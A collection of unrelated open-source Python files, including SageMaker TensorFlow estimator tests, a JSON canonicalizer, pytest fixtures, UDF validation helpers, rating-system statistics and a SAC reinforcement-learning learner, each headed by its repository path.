return Mock(name="sagemaker_session", boto_region_name=REGION)
def _build_tf(sagemaker_session, **kwargs):
return TensorFlow(
sagemaker_session=sagemaker_session,
entry_point="dummy.py",
role="dummy-role",
instance_count=1,
instance_type="ml.c4.xlarge",
**kwargs,
)
@patch("sagemaker.fw_utils.python_deprecation_warning")
def test_estimator_py2_deprecation_warning(warning, sagemaker_session):
estimator = _build_tf(sagemaker_session, framework_version="2.1.1", py_version="py2")
assert estimator.py_version == "py2"
warning.assert_called_with("tensorflow", "2.1.1")
def test_py2_version_deprecated(sagemaker_session):
with pytest.raises(AttributeError) as e:
_build_tf(sagemaker_session, framework_version="2.1.2", py_version="py2")
msg = (
"Python 2 containers are only available with 2.1.1 and lower versions. "
"Please use a Python 3 container."
)
assert msg in str(e.value)
def test_py2_version_is_not_deprecated(sagemaker_session):
estimator = _build_tf(sagemaker_session, framework_version="1.15.0", py_version="py2")
assert estimator.py_version == "py2"
estimator = _build_tf(sagemaker_session, framework_version="2.0.0", py_version="py2")
assert estimator.py_version == "py2"
def test_framework_name(sagemaker_session):
tf = _build_tf(sagemaker_session, framework_version="1.15.2", py_version="py3")
assert tf._framework_name == "tensorflow"
def test_tf_add_environment_variables(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
environment=ENV_INPUT,
)
assert tf.environment == ENV_INPUT
def test_tf_miss_environment_variables(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
environment=None,
)
assert not tf.environment
def test_enable_sm_metrics(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
enable_sagemaker_metrics=True,
)
assert tf.enable_sagemaker_metrics
def test_disable_sm_metrics(sagemaker_session):
tf = _build_tf(
sagemaker_session,
framework_version="1.15.2",
py_version="py3",
enable_sagemaker_metrics=False,
)
assert not tf.enable_sagemaker_metrics
def test_disable_sm_metrics_if_fw_ver_is_less_than_1_15(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) > version.Version("1.14"):
pytest.skip("This test is for TF 1.14 and lower.")
tf = _build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
image_uri="old-image",
)
assert tf.enable_sagemaker_metrics is None
def test_enable_sm_metrics_if_fw_ver_is_at_least_1_15(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) < version.Version("1.15"):
pytest.skip("This test is for TF 1.15 and higher.")
tf = _build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
)
assert tf.enable_sagemaker_metrics
def test_require_image_uri_if_fw_ver_is_less_than_1_11(
sagemaker_session, tensorflow_training_version, tensorflow_training_py_version
):
if version.Version(tensorflow_training_version) > version.Version("1.10"):
pytest.skip("This test is for TF 1.10 and lower.")
with pytest.raises(ValueError) as e:
_build_tf(
sagemaker_session,
framework_version=tensorflow_training_version,
py_version=tensorflow_training_py_version,
)
expected_msg = (
"TF {version} supports only legacy mode. Please supply the image URI directly with "
"'image_uri=520713654638.dkr.ecr.{region}.amazonaws.com/"
"sagemaker-tensorflow:{version}-cpu-py2' and set 'model_dir=False'. If you are using any "
"legacy parameters (training_steps, evaluation_steps, checkpoint_path, requirements_file), "
"make sure to pass them directly as hyperparameters instead."
).format(version=tensorflow_training_version, region=REGION)
assert expected_msg in str(e.value)
|
util/canonicaljson.py | giuseppe/quay | 2,027 | 9359 | <reponame>giuseppe/quay
import collections
import collections.abc
def canonicalize(json_obj, preserve_sequence_order=True):
"""
This function canonicalizes a Python object that will be serialized as JSON.
Example usage: json.dumps(canonicalize(my_obj))
Args:
json_obj (object): the Python object that will later be serialized as JSON.
Returns:
object: json_obj now sorted to its canonical form.
"""
    if isinstance(json_obj, collections.abc.MutableMapping):
sorted_obj = sorted(
{
key: canonicalize(val, preserve_sequence_order) for key, val in json_obj.items()
}.items()
)
return collections.OrderedDict(sorted_obj)
elif isinstance(json_obj, (list, tuple)):
seq = [canonicalize(val, preserve_sequence_order) for val in json_obj]
return seq if preserve_sequence_order else sorted(seq)
return json_obj
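
# Hedged usage sketch (illustrative, not part of the quay module): nested
# mapping keys come back sorted, so serializing the result is deterministic.
#
# >>> import json
# >>> json.dumps(canonicalize({"b": 1, "a": {"d": 2, "c": 3}}))
# '{"a": {"c": 3, "d": 2}, "b": 1}'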
|
external/model-preparation-algorithm/tests/conftest.py | opencv/openvino_training_extensions | 775 | 9370 | <reponame>opencv/openvino_training_extensions<filename>external/model-preparation-algorithm/tests/conftest.py
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
try:
import e2e.fixtures
from e2e.conftest_utils import * # noqa
from e2e.conftest_utils import pytest_addoption as _e2e_pytest_addoption # noqa
from e2e import config # noqa
from e2e.utils import get_plugins_from_packages
pytest_plugins = get_plugins_from_packages([e2e])
except ImportError:
_e2e_pytest_addoption = None
pass
import config
import pytest
from ote_sdk.test_suite.pytest_insertions import *
from ote_sdk.test_suite.training_tests_common import REALLIFE_USECASE_CONSTANT
pytest_plugins = get_pytest_plugins_from_ote()
ote_conftest_insertion(default_repository_name='ote/training_extensions/external/model-preparation-algorithm')
@pytest.fixture
def ote_test_domain_fx():
return 'model-preparation-algorithm'
@pytest.fixture
def ote_test_scenario_fx(current_test_parameters_fx):
assert isinstance(current_test_parameters_fx, dict)
if current_test_parameters_fx.get('usecase') == REALLIFE_USECASE_CONSTANT:
return 'performance'
else:
return 'integration'
@pytest.fixture(scope='session')
def ote_templates_root_dir_fx():
import os.path as osp
import logging
logger = logging.getLogger(__name__)
root = osp.dirname(osp.dirname(osp.realpath(__file__)))
root = f'{root}/configs/'
logger.debug(f'overloaded ote_templates_root_dir_fx: return {root}')
return root
@pytest.fixture(scope='session')
def ote_reference_root_dir_fx():
import os.path as osp
import logging
logger = logging.getLogger(__name__)
root = osp.dirname(osp.dirname(osp.realpath(__file__)))
root = f'{root}/tests/reference/'
logger.debug(f'overloaded ote_reference_root_dir_fx: return {root}')
return root
# pytest magic
def pytest_generate_tests(metafunc):
ote_pytest_generate_tests_insertion(metafunc)
def pytest_addoption(parser):
ote_pytest_addoption_insertion(parser)
|
ibis/udf/validate.py | rtpsw/ibis | 986 | 9371 | """Validation for UDFs.
Warning: This is an experimental module and the API here can change without notice.
DO NOT USE DIRECTLY.
"""
from inspect import Parameter, Signature, signature
from typing import Any, Callable, List
import ibis.common.exceptions as com
from ibis.expr.datatypes import DataType
def _parameter_count(funcsig: Signature) -> int:
"""Get the number of positional-or-keyword or position-only parameters in a
function signature.
Parameters
----------
funcsig : inspect.Signature
A UDF signature
Returns
-------
int
The number of parameters
"""
return sum(
param.kind in {param.POSITIONAL_OR_KEYWORD, param.POSITIONAL_ONLY}
for param in funcsig.parameters.values()
if param.default is Parameter.empty
)
def validate_input_type(
input_type: List[DataType], func: Callable
) -> Signature:
"""Check that the declared number of inputs (the length of `input_type`)
and the number of inputs to `func` are equal.
If the signature of `func` uses *args, then no check is done (since no
check can be done).
Parameters
----------
input_type : List[DataType]
func : callable
Returns
-------
inspect.Signature
"""
funcsig = signature(func)
params = funcsig.parameters.values()
# We can only do validation if all the positional arguments are explicit
# (i.e. no *args)
if not any(param.kind is Parameter.VAR_POSITIONAL for param in params):
declared_parameter_count = len(input_type)
function_parameter_count = _parameter_count(funcsig)
if declared_parameter_count != function_parameter_count:
raise TypeError(
'Function signature {!r} has {:d} parameters, '
'input_type has {:d}. These must match. Non-column '
'parameters must be defined as keyword only, i.e., '
'def foo(col, *, function_param).'.format(
func.__name__,
function_parameter_count,
declared_parameter_count,
)
)
return funcsig
def validate_output_type(output_type: Any) -> None:
"""Check that the output type is a single datatype."""
if isinstance(output_type, list):
raise com.IbisTypeError(
'The output type of a UDF must be a single datatype.'
)
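
# Hedged usage sketch (illustrative; assumes ibis.expr.datatypes exposes the
# usual dtype singletons such as `int64` and `double`):
#
# >>> import ibis.expr.datatypes as dt
# >>> def add_one(col):
# ...     return col + 1
# >>> validate_input_type([dt.int64], add_one)             # matches: returns the Signature
# >>> validate_input_type([dt.int64, dt.double], add_one)  # raises TypeError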
|
summary/summary_avail.py | bit0fun/plugins | 173 | 9395 | from datetime import datetime
# ensure an rpc peer is added
def addpeer(p, rpcpeer):
pid = rpcpeer['id']
if pid not in p.persist['peerstate']:
p.persist['peerstate'][pid] = {
'connected': rpcpeer['connected'],
'last_seen': datetime.now() if rpcpeer['connected'] else None,
'avail': 1.0 if rpcpeer['connected'] else 0.0
}
# exponetially smooth online/offline states of peers
def trace_availability(p, rpcpeers):
p.persist['availcount'] += 1
leadwin = max(min(p.avail_window, p.persist['availcount'] * p.avail_interval), p.avail_interval)
samples = leadwin / p.avail_interval
alpha = 1.0 / samples
beta = 1.0 - alpha
for rpcpeer in rpcpeers['peers']:
pid = rpcpeer['id']
addpeer(p, rpcpeer)
if rpcpeer['connected']:
p.persist['peerstate'][pid]['last_seen'] = datetime.now()
p.persist['peerstate'][pid]['connected'] = True
p.persist['peerstate'][pid]['avail'] = 1.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta
else:
p.persist['peerstate'][pid]['connected'] = False
p.persist['peerstate'][pid]['avail'] = 0.0 * alpha + p.persist['peerstate'][pid]['avail'] * beta
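
# Hedged worked example (numbers are illustrative, not plugin defaults): with
# avail_interval = 300s and avail_window = 3600s, samples = 3600 / 300 = 12,
# so alpha = 1/12 ~ 0.083 and beta ~ 0.917. A peer that was fully available
# (avail = 1.0) and then goes offline decays to ~0.917 after one poll,
# ~0.917**2 ~ 0.84 after two, and so on toward 0.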
|
openskill/statistics.py | CalColson/openskill.py | 120 | 9400 | <gh_stars>100-1000
import sys
import scipy.stats
normal = scipy.stats.norm(0, 1)
def phi_major(x):
return normal.cdf(x)
def phi_minor(x):
return normal.pdf(x)
def v(x, t):
xt = x - t
denom = phi_major(xt)
return -xt if (denom < sys.float_info.epsilon) else phi_minor(xt) / denom
def w(x, t):
xt = x - t
denom = phi_major(xt)
if denom < sys.float_info.epsilon:
return 1 if (x < 0) else 0
return v(x, t) * (v(x, t) + xt)
def vt(x, t):
xx = abs(x)
b = phi_major(t - xx) - phi_major(-t - xx)
if b < 1e-5:
if x < 0:
return -x - t
return -x + t
a = phi_minor(-t - xx) - phi_minor(t - xx)
return (-a if x < 0 else a) / b
def wt(x, t):
xx = abs(x)
b = phi_major(t - xx) - phi_major(-t - xx)
if b < sys.float_info.epsilon:
return 1.0
return ((t - xx) * phi_minor(t - xx) + (t + xx) * phi_minor(-t - xx)) / b + vt(
x, t
) * vt(x, t)
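
# Hedged note (illustrative): v/w are the mean/variance correction factors for
# a normal distribution truncated on one side (win or loss), and vt/wt are the
# two-sided analogues used for draws, in the style of TrueSkill-like updates.
#
# >>> round(phi_major(0.0), 2)   # standard normal CDF at 0
# 0.5
# >>> round(v(0.0, 0.0), 4)      # equals phi_minor(0) / phi_major(0)
# 0.7979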
|
src/tools/pch.py | MaxSac/build | 11,356 | 9445 | # Status: Being ported by Steven Watanabe
# Base revision: 47077
#
# Copyright (c) 2005 <NAME>.
# Copyright 2006 <NAME>
# Copyright (c) 2008 <NAME>
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
##### Using Precompiled Headers (Quick Guide) #####
#
# Make precompiled mypch.hpp:
#
# import pch ;
#
# cpp-pch mypch
# : # sources
# mypch.hpp
#   : # requirements
# <toolset>msvc:<source>mypch.cpp
# ;
#
# Add cpp-pch to sources:
#
# exe hello
# : main.cpp hello.cpp mypch
# ;
from b2.build import type, feature, generators
from b2.tools import builtin
type.register('PCH', ['pch'])
type.register('C_PCH', [], 'PCH')
type.register('CPP_PCH', [], 'PCH')
# Control precompiled header (PCH) generation.
feature.feature('pch',
['on', 'off'],
['propagated'])
feature.feature('pch-header', [], ['free', 'dependency'])
feature.feature('pch-file', [], ['free', 'dependency'])
class PchGenerator(generators.Generator):
"""
Base PCH generator. The 'run' method has the logic to prevent this generator
from being run unless it's being used for a top-level PCH target.
"""
def action_class(self):
return builtin.CompileAction
def run(self, project, name, prop_set, sources):
if not name:
# Unless this generator is invoked as the top-most generator for a
# main target, fail. This allows using 'H' type as input type for
            # this generator, while preventing Boost.Build from trying this
            # generator when not explicitly asked for.
#
# One bad example is msvc, where pch generator produces both PCH
# target and OBJ target, so if there's any header generated (like by
# bison, or by msidl), we'd try to use pch generator to get OBJ from
            # that H, which is completely wrong. By restricting this generator
            # to the pch main target only, such problems are avoided.
pass
else:
r = self.run_pch(project, name,
prop_set.add_raw(['<define>BOOST_BUILD_PCH_ENABLED']),
sources)
return generators.add_usage_requirements(
r, ['<define>BOOST_BUILD_PCH_ENABLED'])
# This rule must be overridden by the derived classes.
def run_pch(self, project, name, prop_set, sources):
pass
# NOTE: requirements are empty, default pch generator can be applied when
# pch=off.
generators.register(builtin.DummyGenerator(
"pch.default-c-pch-generator", False, [], ['C_PCH'], []))
generators.register(builtin.DummyGenerator(
"pch.default-cpp-pch-generator", False, [], ['CPP_PCH'], []))
|
tests/test_parse.py | vkleen/skidl | 700 | 9451 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# The MIT License (MIT) - Copyright (c) 2016-2021 <NAME>.
import pytest
from skidl import netlist_to_skidl
from .setup_teardown import get_filename, setup_function, teardown_function
def test_parser_1():
netlist_to_skidl(get_filename("Arduino_Uno_R3_From_Scratch.net"))
|
jaxrl/agents/sac_v1/sac_v1_learner.py | anuragajay/jaxrl | 157 | 9481 | """Implementations of algorithms for continuous control."""
import functools
from typing import Optional, Sequence, Tuple
import jax
import jax.numpy as jnp
import numpy as np
import optax
from jaxrl.agents.sac import temperature
from jaxrl.agents.sac.actor import update as update_actor
from jaxrl.agents.sac.critic import target_update
from jaxrl.agents.sac_v1.critic import update_q, update_v
from jaxrl.datasets import Batch
from jaxrl.networks import critic_net, policies
from jaxrl.networks.common import InfoDict, Model, PRNGKey
@functools.partial(jax.jit, static_argnames=('update_target',))
def _update_jit(
rng: PRNGKey, actor: Model, critic: Model, value: Model,
target_value: Model, temp: Model, batch: Batch, discount: float,
tau: float, target_entropy: float, update_target: bool
) -> Tuple[PRNGKey, Model, Model, Model, Model, Model, InfoDict]:
new_critic, critic_info = update_q(critic, target_value, batch, discount)
rng, key = jax.random.split(rng)
new_actor, actor_info = update_actor(key, actor, new_critic, temp, batch)
rng, key = jax.random.split(rng)
new_value, value_info = update_v(key, new_actor, new_critic, value, temp,
batch, True)
if update_target:
new_target_value = target_update(new_value, target_value, tau)
else:
new_target_value = target_value
new_temp, alpha_info = temperature.update(temp, actor_info['entropy'],
target_entropy)
return rng, new_actor, new_critic, new_value, new_target_value, new_temp, {
**critic_info,
**value_info,
**actor_info,
**alpha_info
}
class SACV1Learner(object):
def __init__(self,
seed: int,
observations: jnp.ndarray,
actions: jnp.ndarray,
actor_lr: float = 3e-4,
value_lr: float = 3e-4,
critic_lr: float = 3e-4,
temp_lr: float = 3e-4,
hidden_dims: Sequence[int] = (256, 256),
discount: float = 0.99,
tau: float = 0.005,
target_update_period: int = 1,
target_entropy: Optional[float] = None,
init_temperature: float = 1.0):
"""
An implementation of the version of Soft-Actor-Critic described in https://arxiv.org/abs/1801.01290
"""
action_dim = actions.shape[-1]
if target_entropy is None:
self.target_entropy = -action_dim / 2
else:
self.target_entropy = target_entropy
self.tau = tau
self.target_update_period = target_update_period
self.discount = discount
rng = jax.random.PRNGKey(seed)
rng, actor_key, critic_key, temp_key = jax.random.split(rng, 4)
actor_def = policies.NormalTanhPolicy(hidden_dims, action_dim)
actor = Model.create(actor_def,
inputs=[actor_key, observations],
tx=optax.adam(learning_rate=actor_lr))
critic_def = critic_net.DoubleCritic(hidden_dims)
critic = Model.create(critic_def,
inputs=[critic_key, observations, actions],
tx=optax.adam(learning_rate=critic_lr))
value_def = critic_net.ValueCritic(hidden_dims)
value = Model.create(value_def,
inputs=[critic_key, observations],
tx=optax.adam(learning_rate=value_lr))
target_value = Model.create(value_def,
inputs=[critic_key, observations])
temp = Model.create(temperature.Temperature(init_temperature),
inputs=[temp_key],
tx=optax.adam(learning_rate=temp_lr))
self.actor = actor
self.critic = critic
self.value = value
self.target_value = target_value
self.temp = temp
self.rng = rng
self.step = 1
def sample_actions(self,
observations: np.ndarray,
temperature: float = 1.0) -> jnp.ndarray:
rng, actions = policies.sample_actions(self.rng, self.actor.apply_fn,
self.actor.params, observations,
temperature)
self.rng = rng
actions = np.asarray(actions)
return np.clip(actions, -1, 1)
def update(self, batch: Batch) -> InfoDict:
self.step += 1
new_rng, new_actor, new_critic, new_value, new_target_value, new_temp, info = _update_jit(
self.rng, self.actor, self.critic, self.value, self.target_value,
self.temp, batch, self.discount, self.tau, self.target_entropy,
self.step % self.target_update_period == 0)
self.rng = new_rng
self.actor = new_actor
self.critic = new_critic
self.value = new_value
self.target_value = new_target_value
self.temp = new_temp
return info
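
# Hedged usage sketch (illustrative; the dummy shapes and the Batch source are
# assumptions, not part of this module):
#
# import numpy as np
# dummy_obs = np.zeros((1, 17), dtype=np.float32)
# dummy_act = np.zeros((1, 6), dtype=np.float32)
# agent = SACV1Learner(seed=42, observations=dummy_obs, actions=dummy_act)
# actions = agent.sample_actions(dummy_obs)
# # info = agent.update(batch)  # batch: a jaxrl.datasets.Batch of transitions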
|
test_data/samples/alembic_template_output.py | goldstar611/ssort | 238 | 9486 | """Example revision
Revision ID: fdf0cf6487a3
Revises:
Create Date: 2021-08-09 17:55:19.491713
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"example",
sa.Column("example_id", sa.Integer(), nullable=False),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table("measurements")
# ### end Alembic commands ###
|